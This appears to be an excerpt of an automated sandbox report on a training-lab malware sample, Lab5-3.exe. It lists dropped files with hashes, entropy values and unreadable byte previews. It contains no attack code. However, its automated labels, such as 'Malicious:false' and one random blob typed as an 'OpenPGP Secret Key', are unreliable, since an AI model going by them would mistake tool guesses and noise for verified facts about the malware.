                                                                                                          Preview:..}..5p .W.12...j;.+.....n..f...W.E[,8.DH.'Z.......E...,7*|.?.0/(...e.....j.....2..3.....,..Zsh....X.. .Jg..=*..j.X..V4d......)..C....H..yT&~@%U...:.0....,.5o..VH.}....P.5..K.C!T..,..>.@ .....2N3Wk...G......_.*...e....vU......X.......WV5.t..va.i,..:...Sqr..x..k.L...|..N.......;...:.9.....|.~....K....[.-.K...5..(...w4.,.K..v.F....f].$......2*..c....%....4..NNC...Z..J..h...T.?..N[.../m2(w..1..=.W3..........m. lj.S....I....@N;..:..}..r...pa2.....Z.hOc.9.6.tj.ao.e..@qWIZ...T.......d..I...z...cb....mD...I,.Ls)....}.>z.`.[.,.(*.. ....5............X.i......r............WmGA.l...$..v.>.C...... .7y.V.a.r..o...D..E........Y./.>.Y.h.........U....JS..]3p.uV|..."?..Zd1K.%../.Rosu..iqnC..7...0..D.]..Lhh....5.Zy.....7..n+..h..kJxf.fY...z..g..z==...W.......M4.....j.sb..-...{.d.p.l..R.d.i....8.l`.c..z.I..b5.7\.......6.-".O.. .0.l.....G..!..\.........'..C.........yU....x..*Y.>.*[...j0<..c..M.W.....m./b...8c/.17.....2..J|^.gW....V........m.0....`.o..U..O...J.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2832
                                                                                                          Entropy (8bit):7.9392162064917375
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:Llk+OqgIC/44TVcJvJnu4CQE6WxlhbkXHfUTid3hBaUoSGFcmeykEdEElU92i:L3g3/44aRn3tpYc8Gx0uKeY2ElUJ
                                                                                                          MD5:8A83084EE012CAD57AAFFF6069C66E7F
                                                                                                          SHA1:36E7AA979D39BF37A63BBD09F7F5501B4F105E4E
                                                                                                          SHA-256:2A6E0EA67559A52C531C5DD45B07911D8BF40DFC714793A0AF743AAFE151F11D
                                                                                                          SHA-512:2A0F776049D77ACE6BAC6637318F38E599116083F5BF943B496BC2534C19B44AEC30ACDA3C7C37B5DE454F7C6E3583513E8CBF8C08BA29FF7F8D8B327DC32A2A
                                                                                                          Malicious:false
                                                                                                          Preview:"....>.DZ..5.....'.9P.{].'....}....W)RS..3..c}.?...;^.....}.>.t.ZD<?.1.E.L1...%^.S....@.+..-$.._...hL...R.......#8.?*.d.........xY.*P"...W...(fM^|..(Y...3eK..W....C.aq....1.>.G..>O.,.E..G|..-..x./.....+..sOj."].:..JU.\R..}a{^....h.t....1...L..A.x.Ht)..Gd.Q.'w. *..H..d.....w.x70....r.!y?3.q..)........n.@..4g..=..#.....{....[&{.f+...*\...X.....<H..v...*..i...P..i..6.@r.m...,.2m.......<.-....clg;.(..K...,.".{q..AS..=...l..(T[....i4.......nn_l(..3..0k.........+.4...g.'.)r.k.;....,..^=}T.....!../.b<........J+......dL_.-z......Gxab.L..".pcP%l...&...]........B..y^.U,`.m....p.P...j...Y...t.i....}...m..4.1K..i.;..(..{..J.P..b{q.-.._J..f)(jyK*.[.E.~.~...bi.!.\......0.%.Q..3.j..y.%Q.5..;..*....~.Op...H...... ...X....'..]..L...c..R`5q!..ei..+..u(..B...5>R.L=.0-.....iM..(........_..S..Nr6.Y;V.cqU......4...]-&.{.w7..P..e.H.....q.....B2(*....7..;..i.IC...l......d..M.........D-Z.?@0jo.>ldL.....{._.sB...0..c.u..t0..+\.\..'].C....w....2..K......9D....x4.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2784
                                                                                                          Entropy (8bit):7.9427360238128255
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:3WXY6+/JO4SpDyOBTR0Y9Ofu+ypEdTf7NEwg3m1HfUTid3hBaUoSGFcmeykEdEE+:3OY7/o4SpmOhR0Y9O2ObxqGx0uKeY2E+
                                                                                                          MD5:5C7C5EF52F19C3A03FE05893BA985E2A
                                                                                                          SHA1:5ABC81CE747E009AB1C0F03407E2D10EA5734AE9
                                                                                                          SHA-256:501C80B20F47FA191AD17F2654E9CC7F4876125FAABAF28DFC5E5D4F4513A1C3
                                                                                                          SHA-512:27E080E0EC1A97FFE1F1E1EB0FD5559C22B78E09B7DB7A0B721A5C73C3FF0F8EE628B78E280E81208C2BCBFF33326C86ACD5E5B6091AB5DCF202AECFD077E193
                                                                                                          Malicious:false
                                                                                                          Preview:.;V}...K<.*.=..f.6...mB,.....'9..y.^.+..f.B..Fr..#....l3..Y7f..._....$..z.V...X........u...5p......."K`..mu.m..S.......]............n.d..I../J...I....G..]..o...y.K".....D'...;w;.SqRZ.9.|A..Y......M..(.....`.....Y..K[.1...S6U.b.Gm5.}n.^(..Q..9.....6v..C.(B.....B....u.=..U&.-t.%...b.O.W.........&++...1.s.#.@z&Vc.Gd....[....e.7.4........9/......w&b..&P..Dgr...*...]..R.h...!M...4.x..0....#o..h....MMn...>....e.?...r.?...'......QI.......hn ....^_.*N...w.#......;....z*......}...L".I"...Ox6.r.N.....z.M.(.k...-.?...jL..8....O\5/....O..&9T+HT.].,H:..j.`$..P..^..2n#..?t<.. ..0..V._Z1.<.aV%.q.;....y..W.....A...d.6r.>...x........;.tI2.{i.N.A.H8/.......3.Z.H.[c>.w_.f.....5.*@/.F.g........s..,.1......yb'.....pA..=..W....a.K;.7.F_..U....A.....D.--...-L.=j*6.*Z.E..`d.11.<..on}n........ojlh....&./.....S.$.l.Cy..;].).L.N.....2...E..T.s.....%..sq...".*..*.A..N.9.....m.f5nb...]n.(.W..zH..1.K....2.k..ow..../...a.-.>....9D.H/,..b.\.l..."fJ...U.6._. ....0.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2768
                                                                                                          Entropy (8bit):7.932443809679568
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:3vURwCGL14ibTFkWaYyk5VQpIKR3kigpw1befkXc5/HfUTid3hBaUoSGFcmeykEO:fZCc1ZFkRYyQVIz0ig8bP+EGx0uKeY2b
                                                                                                          MD5:8A8F4A932F753DEE26EE6DDF6C2F7AEE
                                                                                                          SHA1:67F5CB8A80CA708FDFC129A24112A8173F48550B
                                                                                                          SHA-256:FF0BEF809B9715C1AB462762FABBBF58FFBD891EFC14AF5E785968D764A992CC
                                                                                                          SHA-512:022DA44C51B0DD512AEA39533F294439A83A9AC704E762083A88ACA1577CC8D99547ED23A80BECAA658EFC52244852AFA49CD621F6F8C9EBC345A6D4B8309E00
                                                                                                          Malicious:false
                                                                                                          Preview:R1C.ry@..Q.d..U.7.W....z..m.\A.V.....(.Q......@9|{2..o....9.....r...[..3.x....R...~....+..]K.ql...~u.......#".V...........*.....|}.+...*.Q;.u0e...h....^...../.....p.)W..VC....D.L.$.P.N1.9.`_.6.o?../.5..D.2.6..n*.E..{s...... `.............%A.d:...'........>.......$.<G..3..O..c|...r.>.:....r|...2.w..g#..k:w"..3..!t+.m{).;....w...$...&. .6w.Z..<:.fY.rk.~ ..%M...e..[."R....1..p.F=..{o.+.....5..+Df.C:.L.%.6...,./..........^...:...so....&.9#...v.<*....?g..Wq9.|/.W.!y]._.u>....KY.%W.v..03.-E...VY....k.....N...re/.(....h....7A....a.\........AE..$c..#...2....N..b.....Y'..M|}...N.H..4.\......Ow........}.....U..a.<.].].z]^.V._...-..*...,...S.m.6.=..c.5..>..j..#.......].*.XP.e@]S`...]E_.e.0........'....]....J.\...h......M7'n[..TG.1Kq.....9RY-eA2%C.R.+.^.".....1_.P...&.\.e....e...+.u.S.}.sh\.A.....g..`..{.EVq.a.....e..2b......y>.'..W.V...C..`.{u<.$.Y.Jv..AbM..s.X..*./*.f....[.vPGFw.K.Y.....~A.[........C..(.}oiy.~.V....3R.e._LLXz.1KhG.a..1RQ....%.`.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2800
                                                                                                          Entropy (8bit):7.93111519953042
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:ciSHcPrrpb+n44gE7Kwiq3vTYQsSfjHfUTid3hBaUoSGFcmeykEdEElU92i:ciSHcD9in44v2wfTHhfwGx0uKeY2ElUJ
                                                                                                          MD5:147DF37A248ECE86523E3426C01383E1
                                                                                                          SHA1:E9C4D5B25884D434C58B88FF23996E8241091EC2
                                                                                                          SHA-256:2800F8E0CCDB4CE4A771979D4FE3EEF127DB6710E01891057DF06DA6DFEF409E
                                                                                                          SHA-512:CA663BAA6C14404F8FF1D72662F56E34C71F88899A178102679C842D78173906648043947BF7B506A4B39736983234A9BB31342148D8B02C42B350F6BA8227F4
                                                                                                          Malicious:false
                                                                                                          Preview:.../<D..P....b.......$........._|../..;^...(.m... .<...NP.h...zN......s.?....vc_....d|@."V.45-.$....l .b..8*..);+...6.A.5../..Rh}..Y..!S.I..a.........^.......!6\...n.B.l.X0.B`..T*\.f...(.....Oj........YN... [..zUJ4d......1.W..W5....5....*..q;....0...M..O.a....;~.B.M.I.$..K.F.+...>..E]V.;.x......<.......x...}G.....h.Qu..(._..A`.$.+.=B++{n....6.......`T.}......eu...{'R.a;....:KX>p..EE.]G....J.(."1H...:.._..*..].]_..Fyb./.B...k.\..HC.${....FK.P..}*oH.l>w............06\[...m.{...)...W.&..._z..a......d......b].:L.H/B>A.-}...&.I.Y.g.?...V.]..p....-.z........]...X..M.....`D7.*.d... J.....EwX...x..&nO.......P.s).9......C.p9&Z...&....>^m..-..@. bU.n........7?.9..=I*...?.%..e..~y....o..D...).qk..&.Q.h...3...X.,k\.+3v.`...`.V...x2...[8.%LZd....i-}.@...T\.,8.....\[..6Y].E......O....6..LM..TF...mI..pju....8..!\M"...}=./.+...;..x..s'F....>.......fD7._...0...IJ{.6fB.B. .}".......3.~f.~......B.o|.h..dkJ.?...H...z.F3..T...m.fX.m.$.uo-..1O..Sq.f1F..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2800
                                                                                                          Entropy (8bit):7.931301230666865
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:qx/zgGUEkEfijKOaKUj7MmPt7O2gSESOax//OaI64HfUTid3hBaUoSGFcmeykEdM:qmGUPEwaKCp7OC8aeaNfGx0uKeY2ElUJ
                                                                                                          MD5:81286917256A5E401F8AFDBC1893F2D8
                                                                                                          SHA1:9F3DAF84AF82AE18A0C8229011398BA5EC11E627
                                                                                                          SHA-256:D632D2F87FA4A846EF8C9135C80140BFABDBEE201CA8E8E20D627EC27C6B0A37
                                                                                                          SHA-512:9389F84CD9A80C5B4394DF75EC99C645DD0D1AAC0F1983FEA745A6EA3F1049CE8FA86E8C869810EA69C163DDBFFFF5F314094254ACE985E4BE236E865E664DD7
                                                                                                          Malicious:false
                                                                                                          Preview:.v.."P...^..........me;..9.....*...0X..QZ4..R+.....q*Rc....5{. A.......}..i.R.4.....AJ8g..YL...~...p...'{..s/."..7Z....r."WH..~...}..xEj.-L.U<....&5g...j.5.#e....O:!L..SO..H<z......7S.pr^p.s.hD#(L.}.A.dv...;k92....~.;:.....F...[7...*..'...}....-].,d....`...P\Z.M}.o#...`...[..?..,..1j..m....J...m\2..c.N..c..Q.U]k@^l...D.<.4G.|....?..+l.....s..1...[...$....`.A".~.9W..h.1....(.*=.E....O.^B-n.$8.(....uU.........r.O..0.....U.==.x(.......l..dW..i...#..]...:.)6."..(...=!.....a.~."...pJ........b..Si.^...B...^..H.R.......`...........*.....O.e...R...J.......5.LZ..z,...A].V9.g..O.f$..k.)...r...,T...B..f&..?.n...Y..Z..>..-.^..S\.....]..`.....A.e..|s.w..D..g.H.c..8bo..~.F..E[b...0.=..q#...+.?.,E.6pm#vWj.,..Q...Y.....!v...Zn.}...Q..`...Hj.B+ .>...H.V#=7..E...G.3j....p..5..0..{H!.`.c.D.n...S$kEy"..S..^.j/i.9..ElpzS#.A.N.....X..HR.IM~...z..e....j1A.AM!.*..9.[...-.rQT.....O..]...[\..x..Z....?..1...>..c.[.....h.m.w.y......F.Ax.?.....,p.H.q.....i.<\.f
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2768
                                                                                                          Entropy (8bit):7.939095029859205
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:CPDQeEmm2xf9K/b7phLf5W8eHfUTid3hBaUoSGFcmeykEdEElU92i:wsmm2xfo/LlW8xGx0uKeY2ElUJ
                                                                                                          MD5:28289A9C2B47685FB50B7EC7B9A4686D
                                                                                                          SHA1:5B98C6A3217605ACCAF798F5CC4147AF6CD6B12C
                                                                                                          SHA-256:19A36D7A4A5425133164933A2C20430DE8D352B033C5EC26A92FE9D2BBD0E930
                                                                                                          SHA-512:57F67B70CA33417FD37BE83FDF98B82EA4D5CB0CE42D6E90A1C16C39FFDEA850C75D6244E4010E554D59DEAE1CA55482561AA013726EF1190E3853E7645702F3
                                                                                                          Malicious:false
                                                                                                          Preview:r...l.P...l".%8.a........>..0..E..*....{k..-...."B....JEU.-...q.v.k....%...kJ.xQ...N..]..E.'j.wzJ..).....t...&%.*.....}...\V.X7mU).U..F......-.e..b..9..Y%.....yU...*..?.H..1$...aLho....pL.b5....;.b/.......:u.Tw)Z......g.....Y..,.O...@....'...j.O.D~B......Rm..2...X5.x^M0.Fz...Asv..xT.LnpsF....@.;.G.-.P..=...@b..U..\.....x...}.5..r..:.Q...ylk..|7E.>./V.....lu..o^..s.m..?T.h.....8..PJ."...$\i...uw4G..|.....Iqc....G...={..o.{........z>>..B..6:Hh...`.s...b...).@_.o......{_.S/....CB.5..2..X..CV....}J>.....&`...l#_B?8S...nJ\K.g..j..c.w.y......h.U.p8...l...3V...\8ls.T.C2.J.....o0...W....H?.l.B$.Mg.8e.E"{.{.6.....&q...^ES.g7.A{5.od...Q..?.b+....mmV..W.....I.d..R.T.3.W..|.P]./Q..#........B.<'hW..sp mFPB|.6.;.}=...#..|r=5Td..Zz.^..u.?./..../.z......wP...f..x.|NRSy.H..f%..2m....^.fA.K...%p.......,.;%.-.*..&.X#.N...V...p/.jJ.v...p.J.......-.B.V..$...@.....Sx|..u.5.Q)..K...I.j...S..C.....?iJ...K..LS....|....9.6...=.\`m.NtNQD........~Z:.*V...VM.o....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2816
                                                                                                          Entropy (8bit):7.936138412532991
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:+6eHnLAv6F/Qz23i+kuywMr9RbHVAVZERJx21HfUTid3hBaUoSGFcmeykEdEElUJ:neHLAv6bDywMr9RZK8DFGx0uKeY2ElUJ
                                                                                                          MD5:049C5C647DB2692AAF70B44783EDE796
                                                                                                          SHA1:10DBC61C94FE56C668F1049C1DC3C32EED01267D
                                                                                                          SHA-256:CB2920B54B495CE48CF04B7DA7BF4CF314C1ABC18AF77416D96E734019E709DB
                                                                                                          SHA-512:4068366598E9D626BA78A85710ACD206836378B89F4F2F164BABE7DCBD3388F2B6EAB6DB8A70261ABF9F3E9AEB3DABB2015FB64A7C407FE7E6F0DD5E705D7125
                                                                                                          Malicious:false
                                                                                                          Preview:."#..<..(M.1.r.h....KF.r...:#..d..%..`.!r.K.XM.10...R..s.J(JsjV......R....<N.!..p...%5....;..$.'..5....2....Z......j.B.WRJ.>.-...<.......G.k Kd.u........Z.....,.<.7S}...JvT..1J...+..ZT..N......-...j$s#.f.U.Pp...D$......M.'..QY...g......S..V.9.W...._u..~j...'~.s\...Y|Ll.G..Aj.........a2Dp.+.{.H.`.rg.H....M3..P.Y'.W.]b....ZI..+Y.q.Y-Fo-q.E...O.c.][>c...I..)Y{)...p......Bl`i.!7..s.'....!.Y.e...>....1.J8...=.t.]..2.~{3C.h.y.y.e..X.T.xJ.I.4...;..~.dY.1.9........0...c..[PT...`.m@^_x.tU...:.?.f.XM....~.....1..S.E....go..$X.....U..5A.E...G...0.G...!.--kO.V*4.....9...4p..r..,R...0..m\......Y,aB..9[..q>'.._.e.X!)..M2.XH...-^s.v.....z..\?;.....K....fh.....U.C.".....GJv....?..u..G0xB6...R.....P.......D?..h..!.....|3...w../......?..A..O.?.%L..)..\[d^...!b"_Or;Gc.o.....)...|.Y ....^Z..*..J.-...B......*q9..?v..j9...N..i]1.T..Oe._^...q.5.B$..z.`.MCb.O...=.?..WC.......ab?..-.JC...4..R.-4...j.x=.....@..+U...L....=......Y....H......7d{"....1.......S.7Fd...E2.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2752
                                                                                                          Entropy (8bit):7.939512008024468
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:z/0uH43Qvhir4AID6ChzwDHpnE17xfyCGR5uW3IRMeHfUTid3hBaUoSGFcmeykEO:z8o4gZE4AIeFHlEFx63EREGx0uKeY2E+
                                                                                                          MD5:E9D96B23F24AF9CD5BBD323AA0A540D7
                                                                                                          SHA1:C9849277266DC02BF52E3C516EA14CE44F621BDA
                                                                                                          SHA-256:019A37306E76CA0EF8EC3B1884401E56F8631889F2207EB8E78A0A515BBA871C
                                                                                                          SHA-512:E4F94B29FE9D058A00DE348218EBCEA614B4AC4A95AA7B6DDEC5F65E15C47E3C2B1C50AD9C8B537494C84F8EEFD53672AC01AA62F4A98277CD6F9F77B1E9A119
                                                                                                          Malicious:false
                                                                                                          Preview:U...j..9..H...g)c.*Id.S..[!P.II.T.V.A^?$..d._I.@....m....G...<.0.4=.?r..s..r..>..L+cx.9.......p.@..#$...P.r.X...".....G.nC..W{V#...u:.@.+...G...ht.%.$..'%.O......,.47v\[..J.....Z.0.\.l....s.J.i*Z.......y....#.v..l......M.;.F.j...]ln;N...P>..... x<q.. 1..p.......;5...H.....z...@..Q.A.K..NL.1D#<..8..J.....O.....'.."RZ.p..Z.h......\_.&..o.jz#...*....=.5.BLl.}?...=..e...u..RAG...J..2....2..$G?N.w.o.......3"1......\gL._[+.O..s.W.sE.A...m..m.M_. ^.~z'..|y`.-...GZ..](..........<}&.j../_#.....8%n..^i.....S.......>DY..N....Jx.&{.|pu.J*.MY~6.U.vT......+.{'..P.......p...b\....j^a-../..b..n....c...t ....d..mT.".y.\.y:..l..os]r..t./.$W.H_.}.1y...>...#vV........>...m......u.C)4..L...L..5.S..C...t8....&.R..#.DeX0....L..1.....Y.5...I.c..<i..<...63r.I....~...f....GV...._...~k.vH.........!...3;....*`./d...R.m..o.B[.+......W..O.M.sc]y.d.....2..z)...=7W.M..L,...)...rZ<..k..l.;..!.Z5..I-|...*.P.....jp....8...i.. .&.......b...eg ...:.-.W.....t.._6..k...j.+...N..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2928
                                                                                                          Entropy (8bit):7.935973871346551
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:sAysdS84Gf01h8qoAeARiY6+4Xc9/jRoNHfUTid3hBaUoSGFcmeykEdEElU92i:sAyGBcr803j0mGx0uKeY2ElUJ
                                                                                                          MD5:FABF7C1E8517E3F5CC2FEE2A6E228509
                                                                                                          SHA1:E24747547CE2035B0523FBD4FAE078D90D5DC211
                                                                                                          SHA-256:8D69C47E983972D051F48742C02D4BDE2DEF7F492D79019DA662F887985277A4
                                                                                                          SHA-512:8114330FE9BB88432585943B643D39A9EEE091D9E729BAEEF9B555C6BB53329B11D74756E1071D59656E507FEB423B114AFB085F67659C061B796F246F958D3F
                                                                                                          Malicious:false
                                                                                                          Preview:e.?..{...._.):..\O..5;{...&.H..@.........yc.O0y......]...Z..?.$H........NI..;.5$..q....&]&y....*.M....-a_...&oKE.1.v.nP..[.g.z-._.#.....3..m..M...X..M...\I.i..Q..D.0.2.b.BO.......Zl....-....M.y..+....l/....J........0 z...o7.I.sP..v....Y..}..Uw......a.C.......w..%J.S..b.0.*....(..1..c..(.Z..A.....^5.M"....N:.~4o...l.]h(...=>..V8.a.3.p.$?..}c......X6..k.7U_..k.;<..+..[..Z.......%.xM..3.#5...&1..'.}@kG./..-5.l/(..y..UafP.oNy]A~.V..2.....E.#%.I^.R.........ud.C.|..w.?.+:k.|..L.E..a.....~.SR.6....}vLp..)mT..bZ].\.Ht.*...w.%........Xl=..gY.E6.l.....O2.._&+...{.......T........h.g...B..L$..$..0.?.U.M......^....n..<Ml....."V.6...{".u ....3u.G.%J.._.Dk......wv")x) K>.?......q...b..3..}.R..-.c.u....sm.'O...l..:tB6.i...kF....*W..i.S6..oo+%..../.*)...9_f....3U..>.Tyq..P &h@..7...~..84....l..c,j.....|..v3.....!...C.f%..$q..TP#.h...../...N...7.e.Nmd.Y.>..4....k.. ...T?....u....Q..E.@N......5..I6c.aC..V....0..}.6(.p?1.R1.r............D?.z./.&M.mp..:.iy.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:OpenPGP Secret Key
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2816
                                                                                                          Entropy (8bit):7.92865285925272
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:hbfWRp3QgwOePt5jy1fFLmRoq/Hqm6G03HZXHfUTid3hBaUoSGFcmeykEdEElU93:hk3xwXF5j8Cl/103HZ8Gx0uKeY2ElUJ
                                                                                                          MD5:FBB20B3D12108B23BF53F7A01EF27CAB
                                                                                                          SHA1:C954C650734EDB1DD265C276A8245EBA3AC7CFF9
                                                                                                          SHA-256:6E0622450594FBC2A6A8B96C0A6E142157850C2D8D0677DD9C8337C8560F9EC1
                                                                                                          SHA-512:F5F62D7BD34B6E881CD175CEBAA1CF5917F085224CF0567DA2C269CF06897BBE5BBDB9E1C2144B973160BD4EFFEEC5C913EF2A76753D8FDB3C05AB7627CD5E32
                                                                                                          Malicious:false
                                                                                                          Preview:...}..U...........$y=%..7v"|..+..w...Q.!.Q..Rt.......|.k...vm.i........;.V.le.xH..|.c..}.w\.`......A.|g..k~s3_x..........FH;...../...+-.~|....CO3$....1G.8....5...0....~]........_\f.|.....$....v.1T...].'..N..n->v.#....v.V..He..z.3..S..Oe.........n#DL......>.W.[.K.x.Y.P]v@....j....o.CXn..Q[..Lj.m.L...'.s.....Ob...x...r.0..m....p....WJ.[...X...w.a.!..*f...n..u.$.1-y.......>..3.aM...9...M...@.I....yY....I2]..o....... D.Q ).V...\|..P..<..2]kx.q.....`JW.k....$f..<....Mp+.rZ.5`.|Fr.G....J.nN..z..5j......._.J.i.`B.z...Cp..E...B..4.;....P..d...f|...c.[.8...%. K.....g.: ...........?.54b<6[.U....$-....$.X..)...S...5......0}v$X(..l....e...E..?Q&...$..<@.&p..O.......>0.S..t..|......i.......U....Q.(...r.$C...yD.3.W...&.M0....o1.W..].... .MQ.V..+.`....C....&.Bl^....,.+r.Hv9.$G.....aH.@....b....,...u.....m...Qi.7h?..m.....ad....W4\.z..r...4oG..j...I.b6...n....\,22hq.YE[O<.|s...-_......!l$.K....$.0~.ai!.7<..\Hn..\.;...@........mm.}X.....C=...E.N..RSY...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2784
                                                                                                          Entropy (8bit):7.936916639235329
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:338dBba/wFj9T9M6Ss1KHfUTid3hBaUoSGFcmeykEdEElU92i:338dB1Fj9T9UeGx0uKeY2ElUJ
                                                                                                          MD5:330577F5E8AEBBEEDE8F99A1B065E3FE
                                                                                                          SHA1:76C950350801D2D99BDF4B1C36C03B104947DF90
                                                                                                          SHA-256:E9D65F9F866CA3C2E0C3610579365C5FEA1AFE15E834908309B018F32B1C1ACF
                                                                                                          SHA-512:8ACB4ABB6CF83FBD6FB013A9829E15A190DE447A7700343A8E943EA33ADFCBE35A38583D49F4B613CEEE050AB82AE6905E35A6DDEF796F61A79185227E9DAEF6
                                                                                                          Malicious:false
                                                                                                          Preview:W..g(...LD..w6....a.9.#l.n.......e.T.....5.A.....L...|t.t.^....T.&k../..3%....Qr.?.q~.+b.^$R....@6.~.I.Y..<D...SR.....E.s?1L..).H....D...>".l.....`.l.[...4xt..%.\...%......&ku.Y........c.(...vb...x..Wg.b.....8.......h.....C.k.o.(..x.:%...+v....^.}...j.........D.[`.[.w...-....o7.v..\.L:+.E...........8G..........}V.[...p..:..d.........x.0...........'X...s.OA.w.f_._Y....{.w..R... .5i....R*..t3..t*.j..2../ ........^+.....?Q.+..,..4....$.#..h.:.T?..8..2..X....#2V.U...o.-J8..0\.R@....(p..R..W...m..s}j......09..&.].....S......NXH.1l+..{s.>{.........|.......~i.....t&.5.}5.E.s....P...`1q.&F.Z.....!..jq\....$....R.x.p.......9.]..e~..g..]...\AD..9W......Z.YT..Z....j.T..C.^..f.7.....G...AQ.G=....L.G..A!d.4..`l..6..Z......|._.d.C..L.).G..>n....,.'[".I..|.o.^....N... 1F(.....q(.Sb*....V.....,..#..-...du...}To...if.......g.KI~..'..'iYa>.2I[....1...t[j...n...,..:..>te3...<...Y.....UU....+....Wd......:.tX...j. .o.p.P.....(.bX.....B.B`.v.kh..;.9.+...oo/.no.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2768
                                                                                                          Entropy (8bit):7.9359479504742705
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:lEZBc4VPYujSpyd9z2xB5O0mvDHfUTid3hBaUoSGFcmeykEdEElU92i:lcBc4axh+0mvQGx0uKeY2ElUJ
                                                                                                          MD5:6275ECEC20E518805FA73C28C41F00E5
                                                                                                          SHA1:AEDCC246B69255FCD95A44FB749CF074A7EDA9EE
                                                                                                          SHA-256:3F2DFBDFF5D0C7A606EDCE1DA917EDDD7E50915497F1D75546937EA9B22E92B5
                                                                                                          SHA-512:6C8FF8DA671F624BA4E7DABBAF07622DB625A3FE033C48D5A2B1AC7AA69458EB1FD95A27FB98BBC2CDC0191D09F73CCD0DF9FF1306614ED9F05A601BBC6EB86C
                                                                                                          Malicious:false
                                                                                                          Preview:~.n.G.......t... ./%z....Z...+e.S.(.g..kb.....q..|.V.........".B..-SU...0,...s.G.w.M...G...p.O..|N..._.u..i..4......+q........tr.S...7..b.)..j...!k.....Ru...8.0..m....-.=Zw....Gk....V....m...K.=r..b..T0E.].,..o......2._t.+....;..V.1.g.D\.$4_b....d.Fl..&..&.3p1...."..O1.c.h....a.+..].y+.3{..83.M...".S..Z...)Z....P........aKM..2..(Glc........o.O.\f.p3.].1.m.FU.....A..:.'/a..o.....C...9.S.&.=N4..O...pr...j_......D`c..7.GK... )...i........z*h.O94...e.z.b..8B..f0#..|%'..G-.1.@.?.]l.h....1A.fR~..?Cs"*.P.......u]N....N8xv.*...Q...I.Th+.].....e...<...i..+k...H......H..LZ.5...\U........./?..I..%..b.N|..Ze.k.|.....c.G..eu...V%.. ....-./.z..]...@.;+*R.c+..1.$C..oj5......&.+o...}.k"...#..........dG..H...`....".],.W..b...o"......*..x..VY.4...R.J..D..X=.......L.>.P..Ot.?%*8..j...../.K...x{K.?6...|.x^+j 8.-..N......Dx..\.qFB........w.5..J...} .b:..L.4<.M~.J"...%(...9.6....J|v<L.r.......)...@.G...l......I)..(....t.W.....$..R....4t.**.'.N.+.t........6..v-.5..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2512
                                                                                                          Entropy (8bit):7.936583406556914
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:t3vF59VpSZL8s+nxe1sk+ZYUNx2HfUTid3hBaUoSGFcmeykEdEElU92i:t3d5/sR1sXNxJGx0uKeY2ElUJ
                                                                                                          MD5:A4AD997D3FBB03739A682E010F58300E
                                                                                                          SHA1:C43D1C2358B56310A89429D693DFF470942C02F7
                                                                                                          SHA-256:F0A157600BBBDDF579C2728C9F449D9C039C4D93D1E9DF4D7547DDB6B20FA4C8
                                                                                                          SHA-512:DCB8133623B26F2AD0C9FA71C5B80E9682C4B01C3DCE37B964E8C4249FC8142659F73C3EAE60CAFBCE00F23156FED2A554A0EC25652353739A6A3E9821C63CE2
                                                                                                          Malicious:false
